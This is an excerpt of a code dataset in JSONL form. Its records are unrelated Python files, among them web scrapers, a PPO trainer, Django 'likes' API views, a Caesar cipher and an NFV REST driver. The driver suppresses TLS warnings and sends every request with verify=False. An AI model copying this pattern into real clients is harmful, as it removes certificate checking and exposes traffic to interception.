time.sleep(10+randint(0, 100)) 문제없었음\n # time.sleep(5+randint(0, 10)) 문제없었음\n # time.sleep(2+randint(0, 3))\n slack_notify(results_string)\n\n\ndef validate_shopee(start_index=0, end_index=None, reverse=False):\n obj = ShopeeScraper()\n store_list = Store.objects.filter(store_type='IS').filter(is_active=True)[start_index:end_index]\n results_string = 'validate shopee from ' + str(start_index)\n if (end_index):\n results_string += ' to ' + str(end_index)\n for i, store_obj in enumerate(store_list):\n print(\"\\n#\" + str(i) + ' validate ' + str(store_obj))\n results_string += (\"\\n#\" + str(i) + ' 
validate ' + str(store_obj))\n product_list = Product.objects.filter(is_active=True, store=store_obj, product_source='SHOPEE')\n for product_obj in product_list:\n try_count = 0\n # obj.get_or_create_product(store_obj, product_obj.shopee_item_id)\n while True:\n if try_count == 5:\n product_obj.is_active = False\n break\n try:\n obj.get_or_create_product(store_obj, product_obj.shopee_item_id)\n break\n except:\n try_count += 1\n time.sleep(5+randint(0, 10))\n slack_notify(results_string)\n\n\nif __name__ == '__main__':\n # pool = mp.Pool(processes=64)\n # update_shopee()\n # pool.map(obj.search_store, store_list)\n # pool.close()\n obj = ShopeeScraper()\n # obj.refactor_search_store(Store.objects.get(insta_id='su._.storee'))\n # obj.get_or_create_product(Store.objects.get(insta_id='onlyqueen.666'), 4047719428)\n # validate_shopee(181, 183)\n","sub_path":"app/crawling/shopee_c.py","file_name":"shopee_c.py","file_ext":"py","file_size_in_byte":29571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"367321534","text":"import os\nfrom os.path import join\nimport click\nfrom PIL import Image\n\n\n@click.command()\n@click.argument('renders_path')\ndef main(renders_path):\n subfolders = os.listdir(renders_path)\n for sf in subfolders:\n renders = os.listdir(join(renders_path, sf))\n for render in renders:\n render = join(renders_path, sf, render)\n im = Image.open(render)\n w, h = im.size\n tw, th = 400, 400\n if w == tw and h == th:\n continue\n\n pw = (w - tw)//2\n ph = (h - th)//2\n res = im.crop((pw, ph, pw+tw, ph+th))\n print(render)\n res.save(render)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/resize_dataset.py","file_name":"resize_dataset.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"505675113","text":"import argparse\nimport gym\nimport os\nimport sys\nimport pickle\nimport time\nimport 
datetime\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom utils import *\nfrom utils.args import *\nfrom plot.plot_logger import *\nfrom models.mlp_policy import Policy\nfrom models.mlp_critic import Value\nfrom models.mlp_policy_disc import DiscretePolicy\nfrom models.mlp_ltr import LtrPolicy\nfrom core.ppo import ppo_step\nfrom core.common import estimate_advantages\nfrom core.agent import Agent\n\ntry:\n path = os.path.join(assets_dir(), 'learned_models/{}_ppo.p'.format(args.env_name))\n models_file=open(path,'r')\n print(\"pre-trained models loaded.\")\n args.model_path = path\n print(\"model path: \", path)\nexcept IOError:\n print(\"pre-trained models not found.\")\n\nif args.log_plot is True:\n plotlogger = plot_logger()\n\ndtype = torch.float64\ntorch.set_default_dtype(dtype)\ndevice = torch.device('cuda', index=args.gpu_index) if torch.cuda.is_available() else torch.device('cpu')\nif torch.cuda.is_available():\n torch.cuda.set_device(args.gpu_index)\n\n\"\"\"environment\"\"\"\nenv = gym.make(args.env_name)\nstate_dim = env.observation_space.shape[0]\nis_disc_action = len(env.action_space.shape) == 0\n# running_state = ZFilter((state_dim,), clip=5)\n# running_reward = ZFilter((1,), demean=False, clip=10)\nrunning_state = None\n\n\"\"\"seeding\"\"\"\nseed = int(time.time())\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nenv.seed(args.seed)\n\n\"\"\"define actor and critic\"\"\"\nif args.model_path is None:\n if is_disc_action:\n policy_net = DiscretePolicy(state_dim, env.action_space.n)\n else:\n policy_net = LtrPolicy(state_dim, env.action_space.shape[0], log_std=args.log_std, ltr_n=args.ltr_n)\n value_net = Value(state_dim)\nelse:\n policy_net, value_net, running_state = pickle.load(open(args.model_path, \"rb\"))\npolicy_net.to(device)\nvalue_net.to(device)\n\noptimizer_policy = torch.optim.Adam(policy_net.parameters(), lr=args.learning_rate)\noptimizer_value = 
torch.optim.Adam(value_net.parameters(), lr=args.learning_rate)\n\n# # optimization epoch number and batch size for PPO\n# optim_epochs = 10\n# optim_batch_size = 64\n\n\"\"\"create agent\"\"\"\nagent = Agent(env, policy_net, device, running_state=running_state, render=args.render, num_threads=args.num_threads)\n\n\ndef update_params(batch, i_iter):\n states = torch.from_numpy(np.stack(batch.state)).to(dtype).to(device)\n actions = torch.from_numpy(np.stack(batch.action)).to(dtype).to(device)\n rewards = torch.from_numpy(np.stack(batch.reward)).to(dtype).to(device)\n masks = torch.from_numpy(np.stack(batch.mask)).to(dtype).to(device)\n repeats = torch.from_numpy(np.stack(batch.repeat)).to(dtype).to(device)\n with torch.no_grad():\n values = value_net(states)\n fixed_log_probs, fixed_rpt_log_probs = policy_net.get_log_prob(states, actions, repeats)\n\n \"\"\"get advantage estimation from the trajectories\"\"\"\n advantages, returns = estimate_advantages(repeats, rewards, masks, values, args.gamma, args.tau, device)\n\n \"\"\"perform mini-batch PPO update\"\"\"\n optim_iter_num = int(math.ceil(states.shape[0] / optim_batch_size))\n for _ in range(optim_epochs):\n perm = np.arange(states.shape[0])\n np.random.shuffle(perm)\n perm = LongTensor(perm).to(device)\n\n states, actions, returns, advantages, repeats, fixed_log_probs, fixed_rpt_log_probs = \\\n states[perm].clone(), actions[perm].clone(), returns[perm].clone(), advantages[perm].clone(), repeats[perm].clone(), fixed_log_probs[perm].clone(), fixed_rpt_log_probs[perm].clone()\n\n for i in range(optim_iter_num):\n ind = slice(i * optim_batch_size, min((i + 1) * optim_batch_size, states.shape[0]))\n states_b, actions_b, advantages_b, returns_b, repeats_b, fixed_log_probs_b, fixed_rpt_log_probs_b = \\\n states[ind], actions[ind], advantages[ind], returns[ind], repeats[ind], fixed_log_probs[ind], fixed_rpt_log_probs[ind]\n\n ppo_step(policy_net, value_net, optimizer_policy, optimizer_value, 1, states_b, actions_b, 
returns_b, \n advantages_b, repeats_b, fixed_log_probs_b, fixed_rpt_log_probs_b, args.clip_epsilon, args.l2_reg)\n\n\ndef main_loop():\n for i_iter in range(args.max_iter_num):\n \"\"\"generate multiple trajectories that reach the minimum batch_size\"\"\"\n batch, log = agent.collect_samples(args.min_batch_size)\n t0 = time.time()\n update_params(batch, i_iter)\n t1 = time.time()\n\n if i_iter % args.log_interval == 0:\n print('{}\\tT_sample {:.4f}\\tT_update {:.4f}\\tR_min {:.2f}\\tR_max {:.2f}\\tR_avg {:.2f}'.format(\n i_iter, log['sample_time'], t1-t0, log['min_reward'], log['max_reward'], log['avg_reward']))\n if args.log_plot is True:\n plotlogger.log(n=i_iter, r_min=log['min_reward'], r_max=log['max_reward'], r_avg=log['avg_reward'])\n\n if args.save_model_interval > 0 and (i_iter+1) % args.save_model_interval == 0:\n to_device(torch.device('cpu'), policy_net, value_net)\n pickle.dump((policy_net, value_net, running_state),\n open(os.path.join(assets_dir(), 'learned_models/{}_ppo.p'.format(args.env_name)), 'wb'))\n to_device(device, policy_net, value_net)\n print(\"model saved!\")\n\n if args.log_plot is True and i_iter%args.log_plot_steps==0 and i_iter>=args.log_plot_steps:\n logplot_path = os.path.join(assets_dir(), 'learned_models/')\n with open(os.path.join(logplot_path+\"logplot\"+str(datetime.datetime.now())+\".pkl\"), \"wb\") as f: pickle.dump(plotlogger._log, f, pickle.HIGHEST_PROTOCOL)\n print(\"plot log succeed.\")\n args.log_plot = False\n exit()\n\n \"\"\"clean up gpu memory\"\"\"\n torch.cuda.empty_cache()\n\n\nmain_loop()\n","sub_path":"train/ltr.py","file_name":"ltr.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"33149419","text":"import subprocess\nfrom pathlib import Path\n\nif __name__ == '__main__':\n path = Path(__file__)\n dir_path = path.parent.resolve()\n text_path = dir_path / 'text.txt'\n config_path = dir_path / 'config.yml'\n 
exec_path = dir_path.parent.parent / 'hercules-extraction.py'\n\n out_path = dir_path / 'translation_extraction_coreference_export_sample.ttl'\n\n cp = subprocess.run(['python', str(exec_path), '--file', str(text_path), '--config', str(config_path), '--out', str(out_path)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n\n print('stdout:')\n print(cp.stdout)\n print('stderr:')\n print(cp.stderr)\n","sub_path":"sample/translation_extraction_coreference_export/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141333195","text":"import random\nfrom revscoring.features import wikitext, revision_oriented, temporal\nfrom revscoring.languages import english\nfrom revscoring.extractors import api\nfrom revscoring.utilities.util import read_observations\nimport mwapi\nimport json\nimport sys, traceback\nimport mwreverts.api\n\nsession = mwapi.Session('https://en.wikipedia.org')\nrev_reverteds = []\nflag = True\nwhile flag == True:\n revid = random.randint(700000000, 900000000)\n try:\n _, reverted, reverted_to = mwreverts.api.check(\n session, revid, radius=5, # most reverts within 5 edits\n window=48 * 60 * 60, # 2 days\n rvprop={'user', 'ids'}) # Some properties we'll make use of\n flag = False\n except (RuntimeError, KeyError) as e:\n #sys.stderr.write(str(e))\n print('Revision ID ' + str(revid) + ' does not exist')\n \nif reverted is not None:\n reverted_doc = [r for r in reverted.reverteds if r['revid'] == revid][0]\n if 'user' not in reverted_doc or 'user' not in reverted.reverting:\n None\n self_revert = reverted_doc['user'] == reverted.reverting['user']\n # revisions that are reverted back to by others\n reverted_back_to = reverted_to is not None and 'user' in reverted_to.reverting and reverted_doc['user'] != reverted_to.reverting['user']\n # If we are reverted, not by self or reverted back to by 
someone else,\n # then, let's assume it was damaging.\n damaging_reverted = not (self_revert or reverted_back_to)\nelse:\n damaging_reverted = False\n \nif reverted is None:\n rev_reverteds.append(('N/A', revid, 'N/A', damaging_reverted)) # Before Rev, Current Rev, After Rev\nelif reverted is not None:\n\n rev_reverteds.append((reverted.reverteds[0]['parentid'], reverted.reverting['revid'], reverted.reverting['revid'],\n damaging_reverted))\n # Before Rev, Before User, Current Rev, Current User, After Rev, After User\n#sys.stderr.write(\"r\" if damaging_reverted else \".\")\n\nfeatures = [\n # Catches long key mashes like kkkkkkkkkkkk\n wikitext.revision.diff.longest_repeated_char_added,\n # Measures the size of the change in added words\n wikitext.revision.diff.words_added,\n # Measures the size of the change in removed words\n wikitext.revision.diff.words_removed,\n # Measures the proportional change in \"badwords\"\n english.badwords.revision.diff.match_prop_delta_sum,\n # Measures the proportional change in \"informals\"\n english.informals.revision.diff.match_prop_delta_sum,\n # Measures the proportional change meaningful words\n english.stopwords.revision.diff.non_stopword_prop_delta_sum,\n # Is the user anonymous\n revision_oriented.revision.user.is_anon,\n # Is the user a bot or a sysop\n revision_oriented.revision.user.in_group({'bot', 'sysop'}),\n # How long ago did the user register?\n temporal.revision.user.seconds_since_registration\n]\n\napi_extractor = api.Extractor(session)\ntry:\n revData = list(api_extractor.extract(revid, features))\n revObserv = {\"rev_id\": revid, \"cache\": revData}\nexcept:\n print('Revision Data Not Found')\n\n#revObserv = json.dumps(revObserv)\n#print(type(revObserv))\nprint('Revision Id: ' + str(revObserv['rev_id']))\nprint('Repeated Characters Added: ' + str(revObserv['cache'][0]))\nprint('Added Characters: ' + str(revObserv['cache'][1]))\nprint('Removed Characters: ' + str(revObserv['cache'][2]))\nprint('Proportional 
Number of Bad Words: ' + str(revObserv['cache'][3]))\nprint('Proportional Number of Informal Words: ' + str(revObserv['cache'][4]))\nprint('Proportional Change of Meaningful Words: ' + str(revObserv['cache'][5]))\nprint('User Anonymity: ' + str(revObserv['cache'][6]))\nprint('User Group: ' + str(revObserv['cache'][7]))\nprint('Registration Time: ' + str(revObserv['cache'][8]))","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"144642082","text":"#zyx\nimport requests\nimport csv\n\nurl = \"https://careers.tencent.com/tencentcareer/api/post/Query\"\n\nheaders = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\",\n}\n\nparams = {'area': ' cn',\n 'attrId': ' ',\n 'bgIds': ' ',\n 'categoryId': ' ',\n 'cityId': ' ',\n 'countryId': ' ',\n 'keyword': ' ',\n 'language': ' zh-cn',\n 'pageIndex': ' 1',\n 'pageSize': ' 10',\n 'parentCategoryId': ' ',\n 'productId': ' ',\n 'timestamp': ' 1602211262824'}\n\n\ndef parse_json(url, params={}):\n \"\"\"解析url,得到字典\"\"\"\n response = requests.get(url=url, headers=headers, params=params)\n return response.json()\n\n\ndef get_position(data):\n \"\"\"获取职位数据\"\"\"\n item = {\n \"postion_name\":\"\",#职位名称\n \"postion_department\":\"\",#职位部门\n \"postion_location\":\"\",#职位所在地\n \"postion_country\":\"\",#职位所在国家\n \"postion_category\":\"\",#职位类别\n \"postion_responsibility\":\"\",#职位职责\n \"postion_url\":\"\",#职位url\n }\n data_list = data[\"Data\"][\"Posts\"]\n for data in data_list:\n item[\"postion_name\"] = data[\"RecruitPostName\"]\n item[\"postion_department\"] = data[\"BGName\"]\n item[\"postion_location\"] = data[\"LocationName\"]\n item[\"postion_country\"] = data[\"CountryName\"]\n item[\"postion_category\"] = data[\"CategoryName\"]\n item[\"postion_responsibility\"] = data[\"Responsibility\"]\n 
item[\"postion_url\"] = data[\"PostURL\"]\n\n save(item)\n print(item)\n print(\"保存完成\")\n\ndef save(item):\n \"\"\"将数据保存到csv中\"\"\"\n with open(\"./腾讯招聘.csv\", \"a\", encoding=\"utf-8\") as file:\n writer = csv.writer(file)\n writer.writerow(item.values())\n\ndef start():\n for i in range(1,635):\n params[\"pageIndex\"] = i\n data = parse_json(url,params)\n get_position(data)\n\nif __name__ == '__main__':\n start()","sub_path":"pythondemo123/tencent2.py","file_name":"tencent2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"602287438","text":"from rest_framework import status\nfrom rest_framework import filters\nfrom rest_framework.generics import ListAPIView, CreateAPIView, GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\n\nfrom likes.api.pagination import get_pagination_class\nfrom likes.api.serializers import (\n LikeListSerializer,\n LikeToggleSerializer,\n LikeContentTypeSerializer\n)\nfrom likes.models import Like\nfrom posts.models import Post\nfrom likes.selectors import get_liked_object_ids, get_users_who_liked_object, get_user_likes\nfrom likes.services import get_user_likes_count\n\nfrom posts.serializers import PostSerializer\n\n__all__ = (\n 'LikedCountAPIView',\n 'LikedIDsAPIView',\n 'LikeToggleView',\n 'LikeListAPIView',\n 'LikersListAPIView',\n)\n\n\nclass LikeToggleView(CreateAPIView):\n \"\"\"\n post:\n API View to like-unlike given object by authenticated user.\\n\n Possible payload:\\n\n {\n \"type\": \"app_label.model\", // object's content type's natural key joined string\n \"id\": 1 // object's primary key\n }\n \"\"\"\n permission_classes = (IsAuthenticated, )\n serializer_class = LikeToggleSerializer\n # serializer_class = PostSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = 
self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n data = serializer.data\n data['is_liked'] = getattr(serializer, 'is_liked', True)\n return Response(\n data,\n status=status.HTTP_201_CREATED,\n headers=self.get_success_headers(serializer.data)\n )\n \nclass LikeAlbumToggleView(CreateAPIView):\n \"\"\"\n post:\n API View to like-unlike given object by authenticated user.\\n\n Possible payload:\\n\n {\n \"type\": \"app_label.model\", // object's content type's natural key joined string\n \"id\": 1 // object's primary key\n }\n \"\"\"\n permission_classes = (IsAuthenticated, )\n serializer_class = LikeToggleSerializer\n # serializer_class = PostSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n data = serializer.data\n data['is_liked'] = getattr(serializer, 'is_liked', True)\n # album = AlbumSerializer()\n return Response(\n data,\n status=status.HTTP_201_CREATED,\n headers=self.get_success_headers(serializer.data)\n )\n\n\n# class LikersListAPIView(ListAPIView):\n# permission_classes = (AllowAny, )\n#\n# def get(self, request, *args, **kwargs):\n# serializer = LikeContentTypeSerializer(data=request.GET)\n# serializer.is_valid(raise_exception=True)\n#\n# return Response(\n# data={\n# 'ids': get_users_who_liked_object(\n# user=self.request.user,\n# content_type=serializer.validated_data.get(\n# 'type'\n# )\n# )\n# }\n# )\n\n\nclass LikedCountAPIView(APIView):\n \"\"\"\n API View to return count of likes for authenticated user.\n \"\"\"\n permission_classes = (AllowAny, )\n\n def get(self, request, *args, **kwargs):\n serializer = LikeContentTypeSerializer(data=request.GET)\n serializer.is_valid(raise_exception=True)\n\n return Response(\n data={\n 'count': get_user_likes_count(\n user=request.user,\n content_type=(\n serializer.validated_data.get(\n 'type'\n 
)\n )\n )\n }\n )\n\n\nclass LikedIDsAPIView(APIView):\n \"\"\"\n User liked ids:\n API View to return liked objects ids for a given user.\n \"\"\"\n permission_classes = (AllowAny, )\n\n def get(self, request, *args, **kwargs):\n serializer = LikeContentTypeSerializer(data=request.GET)\n serializer.is_valid(raise_exception=True)\n post_serializer = PostSerializer\n return Response(\n data={\n 'ids': get_liked_object_ids(\n user=self.request.user,\n content_type=serializer.validated_data.get(\n 'type'\n )\n ),\n # 'posts': Post.objects.filter(likes__user=self.request.user)\n # 'posts': get_user_likes(user=self.request.user, content_type=post_serializer.validated_data.get('type'))\n }\n )\n #\n\n\nclass PostLikedByList(ListAPIView):\n # queryset = Post.objects.all()\n # serializer_class = PostSerializer\n\n\n # permission_classes = (IsAuthenticated,)\n # lookup_field = 'id'\n # def perform_create(self, serializer):\n # serializer.save(publisher=self.request.user)\n\n # def get_queryset(self):\n\n def get(self, request, id):\n \"\"\"\n /posts/:id/likes/\n \"\"\"\n\n post_id = Post.objects.get(id=id).likes.all()\n serializer = LikeListSerializer(post_id, many=True, context={'request': request})\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass LikeListAPIView(ListAPIView):\n \"\"\"\n List API View to return all likes for authenticated user.\n Possible payload:\\n\n {\n \"type\": \"app_label.model\", // object's content type's natural key joined string\n \"id\": 1 // object's primary key\n }\n \"\"\"\n pagination_class = get_pagination_class()\n permission_classes = (IsAuthenticated, )\n serializer_class = LikeListSerializer\n queryset = Like.objects.all()\n filter_backends = (filters.SearchFilter, )\n search_fields = (\n 'content_type__model',\n )\n\n def get_queryset(self):\n return (\n super()\n .get_queryset()\n .filter(\n user=self.request.user\n )\n .select_related('user')\n .distinct()\n 
)\n","sub_path":"likes/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"614374893","text":"from django.contrib import admin\nfrom .models import Quote, SchoolRelatedInformation, Subscriber\n\n\nclass QuoteAdmin(admin.ModelAdmin):\n list_display = ('quote', 'author', 'update_date')\n list_filter = ('update_date',)\n search_fields = ('author', 'quote')\n\n\nclass SubscriberAdmin(admin.ModelAdmin):\n list_display = ('email', 'date')\n list_filter = ('date',)\n\n\nadmin.site.register(Quote, QuoteAdmin)\nadmin.site.register(Subscriber, SubscriberAdmin)\nadmin.site.register(SchoolRelatedInformation)\n","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321255453","text":"# Copyright 2020 Ericsson TEI, Fabio Ubaldi\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport copy\nimport logging\nimport os\nimport re\nfrom typing import Dict, Tuple\nfrom urllib.parse import urlencode\n\nimport requests\nimport urllib3\nfrom urllib3.exceptions import InsecureRequestWarning\n\nfrom adaptation_layer.error_handler import ResourceNotFound, NsNotFound, \\\n BadRequest, ServerError, NsOpNotFound, NsdNotFound\nfrom .interface import Driver, Headers, BodyList, 
Body\n\nurllib3.disable_warnings(InsecureRequestWarning)\nTESTING = os.environ.get(\"TESTING\", False)\nPRISM_ALIAS = os.environ.get(\"PRISM_ALIAS\", \"prism-ever\")\n\nlogger = logging.getLogger('app.driver.ever')\n\nclass EVER(Driver):\n\n def __init__(self, rano_cred):\n self._ranoId = rano_cred[\"rano_id\"]\n self._host = rano_cred[\"host\"]\n self._port = rano_cred[\"port\"] if \"port\" in rano_cred else 8080\n self._headers = {\"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\"}\n\n if TESTING is False:\n self._base_path = 'http://{0}:{1}'.format(self._host, self._port)\n else:\n self._base_path = 'http://{0}:{1}'.format(PRISM_ALIAS, 9999)\n\n def _exec_delete(self, url=None, params=None, headers=None):\n logger.debug('#############execute delete######')\n logger.debug('url= ' + url)\n try:\n resp = requests.delete(url, params=params, verify=False, headers=headers)\n except Exception as e:\n raise ServerError(str(e))\n\n if resp.status_code in (200, 201, 202, 206):\n if 'application/json' in resp.headers['content-type']:\n return resp.json(), resp.headers\n else:\n return resp.text, resp.headers\n elif resp.status_code == 204:\n return None, resp.headers\n elif resp.status_code == 400:\n raise BadRequest()\n elif resp.status_code == 404:\n raise ResourceNotFound()\n else:\n error = resp.json()\n logger.debug('############')\n logger.debug('error: ' + error)\n logger.debug('###########')\n raise ServerError(error)\n\n def _exec_post(self, url=None, data=None, json=None, headers=None):\n logger.debug('#############execute post######')\n logger.debug('url= ' + url)\n try:\n resp = requests.post(url, data=data, json=json, verify=False, headers=headers)\n except Exception as e:\n raise ServerError(str(e))\n\n if resp.status_code in (200, 201, 202, 206):\n try:\n ctype = resp.headers['content-type']\n except KeyError:\n # success but no content\n return None, resp.headers\n if 'application/json' in ctype:\n return resp.json(), resp.headers\n 
else:\n return resp.text, resp.headers\n elif resp.status_code == 204:\n return None, resp.headers\n elif resp.status_code == 400:\n raise BadRequest()\n elif resp.status_code == 404:\n raise ResourceNotFound()\n else:\n if 'application/json' in resp.headers['content-type']:\n error = resp.json()\n else:\n error = resp.text\n logger.debug('############')\n logger.debug('error: ' + error)\n logger.debug('###########')\n raise ServerError(error)\n\n def _exec_get(self, url=None, params=None, headers=None):\n logger.debug('#############execute get######')\n logger.debug('url= ' + url)\n try:\n resp = requests.get(url, params=params, verify=False, headers=headers)\n except Exception as e:\n raise ServerError(str(e))\n\n if resp.status_code in (200, 201, 202, 206):\n if 'application/json' in resp.headers['content-type']:\n return resp.json(), resp.headers\n else:\n return resp.text, resp.headers\n elif resp.status_code == 204:\n return None, resp.headers\n elif resp.status_code == 400:\n raise BadRequest()\n elif resp.status_code == 404:\n raise ResourceNotFound()\n else:\n error = resp.json()\n logger.debug('############')\n logger.debug('error: ' + error)\n logger.debug('###########')\n raise ServerError(error)\n\n # all methods\n\n def get_ns_list(self, args=None) -> Tuple[BodyList, Headers]:\n _url = '{0}/instances'.format(self._base_path)\n _url = self._build_url_query(_url, args)\n ns_list, resp_headers = self._exec_get(_url, headers=self._headers)\n headers = self._build_headers(resp_headers)\n return ns_list, headers\n\n def create_ns(self, args=None) -> Tuple[Body, Headers]:\n _url = '{0}/create'.format(self._base_path)\n _url = self._build_url_query(_url, args)\n try:\n created_ns, resp_headers = self._exec_post(\n _url, json=args['payload'], headers=self._headers)\n except ResourceNotFound:\n nsd_Id = args['payload']['nsdId']\n raise NsdNotFound(nsd_id=nsd_Id)\n headers = self._build_headers(resp_headers)\n return created_ns, headers\n\n def get_ns(self, 
nsId: str, args=None, skip_sol=False) -> Tuple[Body, Headers]:\n _url = '{0}/instances/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n try:\n ns_instance, resp_headers = self._exec_get(_url, headers=self._headers)\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return ns_instance, headers\n\n def delete_ns(self, nsId: str, args: Dict = None) -> Tuple[None, Headers]:\n _url = '{0}/delete/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n try:\n empty_body, resp_headers = self._exec_delete(\n _url, params=None, headers={})\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return None, headers\n\n def instantiate_ns(self, nsId: str, args=None) -> Tuple[None, Headers]:\n _url = '{0}/instantiate/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n instantiate_payload = {}\n try:\n instantiate_payload['SapData'] = args['payload']['SapData']\n except (TypeError, KeyError):\n logger.info('no SapData')\n try:\n empty_body, resp_headers = self._exec_post(\n _url, json=instantiate_payload, headers={})\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return None, headers\n\n def terminate_ns(self, nsId: str, args=None) -> Tuple[None, Headers]:\n _url = '{0}/terminate/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n req_headers = copy.deepcopy(self._headers)\n try:\n del req_headers[\"Content-Type\"]\n except KeyError:\n pass\n try:\n del req_headers[\"Accept\"]\n except KeyError:\n pass\n try:\n emtpy_body, resp_headers = self._exec_post(_url, headers=req_headers)\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return None, headers\n\n def scale_ns(self, nsId: str, args=None) -> Tuple[None, Headers]:\n pass\n\n def get_op_list(self, 
args: Dict = None) -> Tuple[BodyList, Headers]:\n _url = \"{0}/ns_lcm_op_occs\".format(self._base_path)\n _url = self._build_url_query(_url, args)\n op_list, resp_headers = self._exec_get(_url, headers=self._headers)\n headers = self._build_headers(resp_headers)\n return op_list, headers\n\n def get_op(self, nsLcmOpId, args: Dict = None) -> Tuple[Body, Headers]:\n _url = '{0}/ns_lcm_op_occs/{1}'.format(self._base_path, nsLcmOpId)\n _url = self._build_url_query(_url, args)\n try:\n lcm_op, resp_headers = self._exec_get(_url, headers=self._headers)\n except ResourceNotFound:\n raise NsOpNotFound(ns_op_id=nsLcmOpId)\n headers = self._build_headers(resp_headers)\n return lcm_op, headers\n\n @staticmethod\n def _build_url_query(base, args):\n if args and args['args']:\n url_query = urlencode(args['args'])\n return \"{0}?{1}\".format(base, url_query)\n return base\n\n def _build_headers(self, resp_headers):\n headers = {}\n if 'location' in resp_headers:\n re_res = re.findall(\n r\"/(instances|ns_lcm_op_occs)/([A-Za-z0-9\\-]+)\", resp_headers['location'])\n if len(re_res):\n headers['location'] = '/rano/{0}/ns_lcm_op_occs/{1}'.format(self._ranoId, re_res[0][1])\n return headers\n","sub_path":"adaptation_layer/driver/ever.py","file_name":"ever.py","file_ext":"py","file_size_in_byte":9580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457340374","text":"import sys\n\ndef ask_for_type():\n decided = False\n while decided == False:\n enc_or_dec = input(\"Do you want to (e)ncode or (d)ecode a word?\\n\")\n enc_or_dec = enc_or_dec.lower()\n\n if enc_or_dec == 'e':\n encode = True\n decided = True\n elif enc_or_dec == 'd':\n encode = False\n decided = True\n else:\n print(\"Invalid input, try again...\")\n return encode\n\ndef ask_for_word():\n word = input(\"Which word shall I process?\\n\")\n return word\n\ndef ask_for_key():\n key = input(\"With which key shall I process the word?\\n\")\n return int(key)\n\ndef 
encode(word, key, enc):\n if enc == False:\n key = -key\n new_word = []\n for c in word:\n if c.isupper() == True:\n ascii_shift = 65\n else: # lowercase char\n ascii_shift = 97\n number = ord(c) - ascii_shift\n key_transformed = (number + key) % 26\n final_character = chr(key_transformed + ascii_shift)\n new_word.append(final_character)\n return ''.join(new_word)\n\n\n# main\n\nprint(\"Welcome to caesar cypher!\")\nenc = ask_for_type()\nword = ask_for_word()\nkey = ask_for_key()\noutput = encode(word, key, enc)\nprint(output)\n","sub_path":"easy/003/caesarcypher.py","file_name":"caesarcypher.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"204263610","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport decision_tree_library\n\n# Gradient boosting: gather an ensemble of weak learners (trees).\n# Each new learner learns what all previous learners missed\n# to learn: each new learner uses residual (= initial target - best\n# previous prediction) as target.\n\ndef generate_data():\n # Generate 1D dataset.\n x = np.arange(0, 50)\n a, b = 30, 20\n y = a*x + b\n sigma = 100.\n y = np.random.normal(y, sigma, size=y.shape)\n\n # Shape data.\n x = x.reshape(-1, 1)\n y = y.reshape(-1, 1)\n\n return x, y\n\ndef gradient_boosting_training(x_train, y_train):\n # Gradient boosting: training (skeleton algorithm).\n grad_boost = []\n y_pred_cumulated = np.zeros(y_train.shape)\n residual = y_train # Initialize residuals to y_train.\n max_depth, learning_rate, n_estimators = 10, 0.1, 50\n for i in range(n_estimators):\n # Gradient boosting: i-th step.\n train_set = np.concatenate((x_train, residual), axis=1) # Use residual as target.\n if i == 